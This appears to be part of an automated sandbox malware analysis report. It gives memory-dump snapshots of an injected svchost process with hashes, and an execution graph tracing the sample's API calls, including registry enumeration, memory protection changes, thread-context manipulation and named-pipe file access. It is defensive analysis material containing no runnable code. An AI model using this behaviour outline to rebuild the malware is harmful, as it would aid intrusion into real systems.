                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: be2aa582aae54b33b491b9ee818e6c6d18c9888b0f349d6607bddd9af311e007
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A51043AA04280D6EBB4AF91D248B5A77B0F750BA6F148135DB9847BC7EBB8D453C700
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: cce46f0fa1378ea43ad5cf95f61130987cd79dd7c1dd67fdc4edc1ecf2f10c6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A651B32AE08380A1FEADAEA5E27876B77A1B385740F444935DF4903B9BCABDC505C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 055a778cff11323dffc1db978895651ca4ad035b3ed6653d7e204861c88b4515
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF41C366B14A4092EBA0EF65E5583AA77B1F388784F445031EF4E87799EBBCC445C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 0c024b3125dcca8c1982990d9c76ca101d53b80ce949555d51dd3c997593c46a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF118B36A08B8082EBA48F14E55424A77E4FB88B84F194630EF8C07765EF7CC451CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: 5234f3ecd236f550e97028695711534056cca23beb260fb795f50d6a260626a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74115E29E01B5491FA88EFE6E51822A77B1FB89FC0F1894349F4D43766DEB8C462C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: 3e1e9a40939542c600504de3384a6c328f8b6d35d2671f485f6e89c9c26a68de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE03939A0160486EB44AFA2D92834A3AE1EB8DB06F04D0348E0907352DFBD8499C750

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:1633
                                                                                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                                                                                execution_graph 8372 13de2732010 8375 13de272f200 8372->8375 8376 13de272f20d 8375->8376 8377 13de272f252 8375->8377 8381 13de272d46c 8376->8381 8379 13de272f23c 8398 13de272eed8 8379->8398 8382 13de272d47d FlsGetValue 8381->8382 8383 13de272d498 FlsSetValue 8381->8383 8384 13de272d492 8382->8384 8395 13de272d48a 8382->8395 8385 13de272d4a5 8383->8385 8383->8395 8384->8383 8386 13de272dc3c _invalid_parameter_noinfo 7 API calls 8385->8386 8387 13de272d4b4 8386->8387 8388 13de272d4d2 FlsSetValue 8387->8388 8389 13de272d4c2 FlsSetValue 8387->8389 8391 13de272d4f0 8388->8391 8392 13de272d4de FlsSetValue 8388->8392 8390 13de272d4cb 8389->8390 8393 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8390->8393 8394 13de272d104 _invalid_parameter_noinfo 7 API calls 8391->8394 8392->8390 8393->8395 8396 13de272d4f8 8394->8396 8395->8379 8396->8395 8397 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8396->8397 8397->8395 8421 13de272f148 8398->8421 8405 13de272ef43 8406 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8405->8406 8408 13de272ef2a 8406->8408 8407 13de272ef52 8445 13de272f27c 8407->8445 8408->8377 8411 13de272f04e 8412 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8411->8412 8413 13de272f053 8412->8413 8417 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8413->8417 8414 13de272f0a9 8416 13de272f110 8414->8416 8456 13de272ea08 8414->8456 8415 13de272f068 8415->8414 8418 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8415->8418 8420 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8416->8420 8417->8408 8418->8414 8420->8408 8422 13de272f16b 8421->8422 8423 
13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8422->8423 8425 13de272f175 8422->8425 8424 13de272f188 8423->8424 8424->8425 8426 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8424->8426 8427 13de272ef0d 8425->8427 8428 13de272d46c 12 API calls 8425->8428 8426->8425 8431 13de272ebd8 8427->8431 8429 13de272f23c 8428->8429 8430 13de272eed8 39 API calls 8429->8430 8430->8427 8469 13de272e724 8431->8469 8434 13de272ebf8 GetOEMCP 8437 13de272ec1f 8434->8437 8435 13de272ec0a 8436 13de272ec0f GetACP 8435->8436 8435->8437 8436->8437 8437->8408 8438 13de272cf7c 8437->8438 8439 13de272cfc7 8438->8439 8443 13de272cf8b _invalid_parameter_noinfo 8438->8443 8441 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8439->8441 8440 13de272cfae HeapAlloc 8442 13de272cfc5 8440->8442 8440->8443 8441->8442 8442->8405 8442->8407 8443->8439 8443->8440 8444 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 8443->8444 8444->8443 8446 13de272ebd8 19 API calls 8445->8446 8447 13de272f2a9 8446->8447 8448 13de272f3ff 8447->8448 8450 13de272f2e6 IsValidCodePage 8447->8450 8455 13de272f300 8447->8455 8545 13de2727950 8448->8545 8450->8448 8452 13de272f2f7 8450->8452 8451 13de272f045 8451->8411 8451->8415 8453 13de272f326 GetCPInfo 8452->8453 8452->8455 8453->8448 8453->8455 8534 13de272ecf0 8455->8534 8457 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8456->8457 8458 13de272ea24 8457->8458 8459 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8458->8459 8462 13de272ea51 8458->8462 8460 13de272eac0 8459->8460 8616 13de272dae0 8460->8616 8463 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8462->8463 8466 13de272eb03 8462->8466 8464 13de272eb61 8463->8464 8465 13de272dae0 _invalid_parameter_noinfo 20 API calls 8464->8465 8465->8466 8467 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8466->8467 8468 
13de272eb9d 8466->8468 8467->8468 8468->8416 8470 13de272e743 8469->8470 8471 13de272e748 8469->8471 8470->8434 8470->8435 8471->8470 8477 13de272d398 8471->8477 8473 13de272e763 8512 13de273096c 8473->8512 8478 13de272d3ad Concurrency::details::SchedulerProxy::DeleteThis 8477->8478 8479 13de272d3bc FlsGetValue 8478->8479 8480 13de272d3d9 FlsSetValue 8478->8480 8481 13de272d3d3 8479->8481 8485 13de272d3c9 _invalid_parameter_noinfo 8479->8485 8482 13de272d3eb 8480->8482 8480->8485 8481->8480 8483 13de272dc3c _invalid_parameter_noinfo 7 API calls 8482->8483 8484 13de272d3fa 8483->8484 8486 13de272d418 FlsSetValue 8484->8486 8487 13de272d408 FlsSetValue 8484->8487 8488 13de272d452 8485->8488 8496 13de272d47d FlsGetValue 8485->8496 8497 13de272d498 FlsSetValue 8485->8497 8490 13de272d424 FlsSetValue 8486->8490 8491 13de272d436 8486->8491 8489 13de272d411 8487->8489 8488->8473 8493 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8489->8493 8490->8489 8492 13de272d104 _invalid_parameter_noinfo 7 API calls 8491->8492 8494 13de272d43e 8492->8494 8493->8485 8495 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8494->8495 8495->8485 8498 13de272d492 8496->8498 8502 13de272d48a 8496->8502 8499 13de272d4a5 8497->8499 8497->8502 8498->8497 8500 13de272dc3c _invalid_parameter_noinfo 7 API calls 8499->8500 8501 13de272d4b4 8500->8501 8503 13de272d4d2 FlsSetValue 8501->8503 8504 13de272d4c2 FlsSetValue 8501->8504 8502->8473 8506 13de272d4f0 8503->8506 8507 13de272d4de FlsSetValue 8503->8507 8505 13de272d4cb 8504->8505 8508 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8505->8508 8509 13de272d104 _invalid_parameter_noinfo 7 API calls 8506->8509 8507->8505 8508->8502 8510 13de272d4f8 8509->8510 8510->8502 8511 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8510->8511 8511->8502 8513 13de2730981 8512->8513 8514 13de272e786 8512->8514 8513->8514 8520 13de2730fcc 8513->8520 8516 
13de27309d8 8514->8516 8517 13de27309ed 8516->8517 8518 13de2730a00 8516->8518 8517->8518 8531 13de272f260 8517->8531 8518->8470 8521 13de272d398 _invalid_parameter_noinfo 17 API calls 8520->8521 8522 13de2730fdb 8521->8522 8523 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8522->8523 8526 13de2731014 8522->8526 8524 13de2731004 8523->8524 8527 13de273103c 8524->8527 8526->8514 8528 13de273104e Concurrency::details::SchedulerProxy::DeleteThis 8527->8528 8530 13de273105b 8527->8530 8529 13de2730d24 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8528->8529 8528->8530 8529->8530 8530->8526 8532 13de272d398 _invalid_parameter_noinfo 17 API calls 8531->8532 8533 13de272f269 8532->8533 8535 13de272ed2d GetCPInfo 8534->8535 8536 13de272ee23 8534->8536 8535->8536 8541 13de272ed40 8535->8541 8537 13de2727950 _log10_special IsProcessorFeaturePresent 8536->8537 8538 13de272eec2 8537->8538 8538->8448 8550 13de2731ab4 8541->8550 8546 13de2727959 8545->8546 8547 13de2727964 8546->8547 8548 13de2728128 IsProcessorFeaturePresent 8546->8548 8547->8451 8549 13de2728140 capture_previous_context 8548->8549 8549->8451 8551 13de272e724 17 API calls 8550->8551 8552 13de2731af6 8551->8552 8570 13de272f5ec 8552->8570 8571 13de272f5f5 MultiByteToWideChar 8570->8571 8619 13de272d978 8616->8619 8620 13de272d9a3 8619->8620 8627 13de272da14 8620->8627 8622 13de272d9ca 8624 13de272d9ed 8622->8624 8633 13de272cd10 8622->8633 8625 13de272da02 8624->8625 8626 13de272cd10 _invalid_parameter_noinfo 20 API calls 8624->8626 8625->8462 8626->8625 8644 13de272d75c 8627->8644 8629 13de272da4f _invalid_parameter_noinfo 8629->8622 8630 13de272da3e _invalid_parameter_noinfo 8630->8629 8631 13de272d978 _invalid_parameter_noinfo 20 API calls 8630->8631 8632 13de272daf9 8631->8632 8632->8622 8634 13de272cd68 8633->8634 8635 13de272cd1f Concurrency::details::SchedulerProxy::DeleteThis 8633->8635 8634->8624 8636 13de272d5d8 _invalid_parameter_noinfo 10 API calls 
[Execution graph residue: a control-flow graph of the sample's native code (function nodes at addresses 13de2721e74 through 13de2736240) flattened into node/edge text. Recoverable content: CRT/runtime internals (_invalid_parameter_noinfo, _CallSETranslator, __CxxCallCatchBlock, __FrameHandler3::FrameUnwindToEmptyState, __FrameHandler3::GetHandlerSearchState, Is_bad_exception_allowed, Concurrency::details::SchedulerProxy::DeleteThis, __vcrt_uninitialize_ptd, __vcrt_InitializeCriticalSectionEx, __std_exception_copy, __std_exception_destroy, __GSHandlerCheckCommon, __scrt_dllmain_exception_filter, _log10_special, type_info::_name_internal_method, std::bad_alloc::bad_alloc, Concurrency::cancel_current_task) and Win32 API nodes reached from them: FlsGetValue, FlsSetValue, TlsSetValue, StrCmpNIW, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, RaiseException, RtlUnwindEx, EncodePointer, VirtualProtect, VirtualProtectEx, VirtualQuery, VirtualFree, FlushInstructionCache, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetThreadContext, SetThreadContext, ResumeThread, TerminateThread, FreeLibraryAndExitThread, TerminateProcess, ExitProcess, GetLastError, CloseHandle, GetModuleHandleW, GetModuleHandleExW, LoadLibraryExW, GetProcAddress, FreeLibrary, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, FindFirstFileExW, MultiByteToWideChar, HeapReAlloc, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW.]
9031 13de272fe97 9029->9031 9030->9031 9032 13de273227c 25 API calls 9030->9032 9035 13de272feb8 9031->9035 9033 13de272fe26 9032->9033 9033->9031 9034 13de272fe50 GetFileType 9033->9034 9034->9033 9036 13de272fed6 9035->9036 9037 13de272ffa5 9036->9037 9038 13de272ff31 GetStdHandle 9036->9038 9037->9015 9038->9036 9039 13de272ff44 GetFileType 9038->9039 9039->9036 9041 13de272dc3c _invalid_parameter_noinfo 7 API calls 9040->9041 9046 13de27321a5 9041->9046 9042 13de2732207 9043 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9042->9043 9044 13de2732211 9043->9044 9044->9027 9045 13de272fb7c 5 API calls 9045->9046 9046->9042 9046->9045 9980 13de2722b40 9982 13de2722bb1 9980->9982 9981 13de2722ef4 9982->9981 9983 13de2722bdd GetModuleHandleA 9982->9983 9984 13de2722bef GetProcAddress 9983->9984 9985 13de2722c01 9983->9985 9984->9985 9985->9981 9986 13de2722c28 StrCmpNIW 9985->9986 9986->9981 9990 13de2722c4d 9986->9990 9987 13de27219a4 6 API calls 9987->9990 9988 13de2722d5f lstrlenW 9988->9990 9989 13de2722e19 lstrlenW 9989->9990 9990->9981 9990->9987 9990->9988 9990->9989 9991 13de2723858 StrCmpNIW 9990->9991 9992 13de2721534 StrCmpIW StrCmpW 9990->9992 9991->9990 9992->9990 9047 13de272f5c4 GetCommandLineA GetCommandLineW 8130 13de2721ac4 8135 13de2721630 GetProcessHeap HeapAlloc 8130->8135 8132 13de2721ada Sleep SleepEx 8133 13de2721ad3 8132->8133 8133->8132 8134 13de27215a0 StrCmpIW StrCmpW 8133->8134 8134->8133 8179 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8135->8179 8137 13de2721658 8180 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8137->8180 8139 13de2721669 8181 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8139->8181 8141 13de2721672 8182 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8141->8182 8143 13de272167b 8144 13de2721696 RegOpenKeyExW 8143->8144 8145 13de27218ae 8144->8145 8146 13de27216c8 RegOpenKeyExW 8144->8146 8145->8133 8147 13de27216f1 8146->8147 
8148 13de2721707 RegOpenKeyExW 8146->8148 8183 13de27212bc RegQueryInfoKeyW 8147->8183 8150 13de2721742 RegOpenKeyExW 8148->8150 8151 13de272172b 8148->8151 8154 13de272177d RegOpenKeyExW 8150->8154 8155 13de2721766 8150->8155 8192 13de272104c RegQueryInfoKeyW 8151->8192 8156 13de27217a1 8154->8156 8157 13de27217b8 RegOpenKeyExW 8154->8157 8159 13de27212bc 16 API calls 8155->8159 8160 13de27212bc 16 API calls 8156->8160 8161 13de27217f3 RegOpenKeyExW 8157->8161 8162 13de27217dc 8157->8162 8163 13de2721773 RegCloseKey 8159->8163 8164 13de27217ae RegCloseKey 8160->8164 8166 13de272182e RegOpenKeyExW 8161->8166 8167 13de2721817 8161->8167 8165 13de27212bc 16 API calls 8162->8165 8163->8154 8164->8157 8168 13de27217e9 RegCloseKey 8165->8168 8170 13de2721852 8166->8170 8171 13de2721869 RegOpenKeyExW 8166->8171 8169 13de272104c 6 API calls 8167->8169 8168->8161 8174 13de2721824 RegCloseKey 8169->8174 8175 13de272104c 6 API calls 8170->8175 8172 13de272188d 8171->8172 8173 13de27218a4 RegCloseKey 8171->8173 8176 13de272104c 6 API calls 8172->8176 8173->8145 8174->8166 8177 13de272185f RegCloseKey 8175->8177 8178 13de272189a RegCloseKey 8176->8178 8177->8171 8178->8173 8179->8137 8180->8139 8181->8141 8182->8143 8184 13de2721327 GetProcessHeap HeapAlloc 8183->8184 8185 13de272148a RegCloseKey 8183->8185 8186 13de2721352 RegEnumValueW 8184->8186 8187 13de2721476 GetProcessHeap HeapFree 8184->8187 8185->8148 8188 13de27213a5 8186->8188 8187->8185 8188->8186 8188->8187 8189 13de2721534 2 API calls 8188->8189 8190 13de272141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 8188->8190 8191 13de27213d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8188->8191 8189->8188 8190->8188 8191->8190 8193 13de27211b5 RegCloseKey 8192->8193 8195 13de27210bf 8192->8195 8193->8150 8194 13de27210cf RegEnumValueW 8194->8195 8195->8193 8195->8194 8196 13de272114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8195->8196 8196->8195 9193 13de2725244 9194 13de272524a 9193->9194 9205 13de272787c 
9194->9205 9198 13de27252ae 9199 13de2725347 9199->9198 9202 13de27254cd 9199->9202 9218 13de2727450 9199->9218 9201 13de27255cb 9202->9201 9203 13de2725647 VirtualProtect 9202->9203 9203->9198 9204 13de2725673 GetLastError 9203->9204 9204->9198 9208 13de2727887 9205->9208 9206 13de272528d 9206->9198 9214 13de2723cd0 9206->9214 9207 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 9207->9208 9208->9206 9208->9207 9209 13de27278a6 9208->9209 9210 13de27278b1 9209->9210 9224 13de2728098 9209->9224 9228 13de27280b8 9210->9228 9215 13de2723ced 9214->9215 9217 13de2723d5c 9215->9217 9237 13de2723f40 9215->9237 9217->9199 9219 13de2727497 9218->9219 9262 13de2727220 9219->9262 9222 13de2727950 _log10_special IsProcessorFeaturePresent 9223 13de27274c1 9222->9223 9223->9199 9225 13de27280a6 std::bad_alloc::bad_alloc 9224->9225 9232 13de2728a58 9225->9232 9227 13de27280b7 9229 13de27280c6 std::bad_alloc::bad_alloc 9228->9229 9230 13de2728a58 Concurrency::cancel_current_task 2 API calls 9229->9230 9231 13de27278b7 9230->9231 9233 13de2728a77 9232->9233 9234 13de2728aa0 RtlPcToFileHeader 9233->9234 9235 13de2728ac2 RaiseException 9233->9235 9236 13de2728ab8 9234->9236 9235->9227 9236->9235 9238 13de2723f64 9237->9238 9239 13de2723f87 9237->9239 9238->9239 9251 13de27239f0 9238->9251 9240 13de2723fbd 9239->9240 9257 13de2723b20 9239->9257 9242 13de2723fed 9240->9242 9246 13de2723b20 2 API calls 9240->9246 9244 13de2724023 9242->9244 9247 13de27239f0 3 API calls 9242->9247 9245 13de272403f 9244->9245 9248 13de27239f0 3 API calls 9244->9248 9249 13de272405b 9245->9249 9250 13de2723b20 2 API calls 9245->9250 9246->9242 9247->9244 9248->9245 9249->9217 9250->9249 9255 13de2723a11 9251->9255 9252 13de2723a80 9252->9239 9253 13de2723a66 VirtualQuery 9253->9252 9253->9255 9254 13de2723a9a VirtualAlloc 9254->9252 9256 13de2723acb GetLastError 9254->9256 9255->9252 9255->9253 9255->9254 9256->9252 9256->9255 9258 13de2723b38 9257->9258 9259 13de2723b8d VirtualQuery 9258->9259 
9260 13de2723ba7 9258->9260 9261 13de2723bf2 GetLastError 9258->9261 9259->9258 9259->9260 9260->9240 9261->9258 9263 13de272723b 9262->9263 9264 13de272725f 9263->9264 9265 13de2727251 SetLastError 9263->9265 9264->9222 9265->9264 9530 13de272cec4 9531 13de272cecc 9530->9531 9532 13de272fb7c 5 API calls 9531->9532 9533 13de272cefd 9531->9533 9534 13de272cef9 9531->9534 9532->9531 9536 13de272cf28 9533->9536 9537 13de272cf53 9536->9537 9538 13de272cf57 9537->9538 9539 13de272cf36 DeleteCriticalSection 9537->9539 9538->9534 9539->9537 9993 13de2722544 9995 13de27225c3 9993->9995 9994 13de27226f4 9995->9994 9996 13de2722625 GetFileType 9995->9996 9997 13de2722633 StrCpyW 9996->9997 9998 13de2722649 9996->9998 10000 13de2722658 9997->10000 10009 13de2721a48 GetFinalPathNameByHandleW 9998->10009 10003 13de27226f9 10000->10003 10007 13de2722662 10000->10007 10001 13de2723858 StrCmpNIW 10001->10003 10002 13de2723858 StrCmpNIW 10002->10007 10003->9994 10003->10001 10004 13de2723058 4 API calls 10003->10004 10005 13de2721cb4 2 API calls 10003->10005 10004->10003 10005->10003 10007->9994 10007->10002 10014 13de2723058 StrCmpIW 10007->10014 10018 13de2721cb4 10007->10018 10010 13de2721ab1 10009->10010 10011 13de2721a72 StrCmpNIW 10009->10011 10010->10000 10011->10010 10012 13de2721a8c lstrlenW 10011->10012 10012->10010 10013 13de2721a9e StrCpyW 10012->10013 10013->10010 10015 13de27230a1 PathCombineW 10014->10015 10016 13de272308a StrCpyW StrCatW 10014->10016 10017 13de27230aa 10015->10017 10016->10017 10017->10007 10019 13de2721cd4 10018->10019 10020 13de2721ccb 10018->10020 10019->10007 10021 13de2721534 2 API calls 10020->10021 10021->10019 9266 13de272224c GetProcessIdOfThread GetCurrentProcessId 9267 13de272227d 9266->9267 9268 13de272231a 9266->9268 9273 13de272193c OpenProcess 9267->9273 9271 13de272228f CreateFileW 9271->9268 9272 13de27222d3 WriteFile ReadFile CloseHandle 9271->9272 9272->9268 9274 13de2721991 9273->9274 9275 13de2721968 IsWow64Process 9273->9275 
